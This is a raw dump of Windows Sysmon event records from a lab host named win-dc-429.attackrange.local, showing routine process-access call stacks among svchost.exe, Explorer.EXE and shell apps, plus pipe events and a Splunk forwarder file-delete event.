10341000x80000000000000001055747Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+37172|c:\windows\system32\rpcss.dll+47a1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055746Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055745Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055744Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055743Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.118{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055742Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7705|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001055741Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7705|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001055740Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.103{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055739Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.103{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055738Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.025{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51AA342DB39F4A70BD6A6B22A72935B0,SHA256=70AC24C925A2AFA78484726BEA94B54B9A3C52EB8848844096BBA966B4AC4C26,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055900Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.978{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055899Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055898Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055897Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CD0-6151-2C00-00000000FD01}24243124C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055896Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CD0-6151-2C00-00000000FD01}24243124C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 18141800x80000000000000001055895Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:21:49.963{5EBD8912-8D2A-6151-9600-00000000FD01}4632\TDLN-4632-41C:\Windows\Explorer.EXE 17141700x80000000000000001055894Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:21:49.963{5EBD8912-8CD0-6151-2C00-00000000FD01}2424\TDLN-4632-41C:\Windows\system32\svchost.exe 10341000x80000000000000001055893Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CD0-6151-2C00-00000000FD01}24243124C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055892Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CD0-6151-2C00-00000000FD01}24243124C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001055891Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055890Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055889Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055888Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055887Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.963{5EBD8912-8D2A-6151-9600-00000000FD01}46323280C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+37bbe|C:\Windows\System32\wpncore.dll+232a3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001055886Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 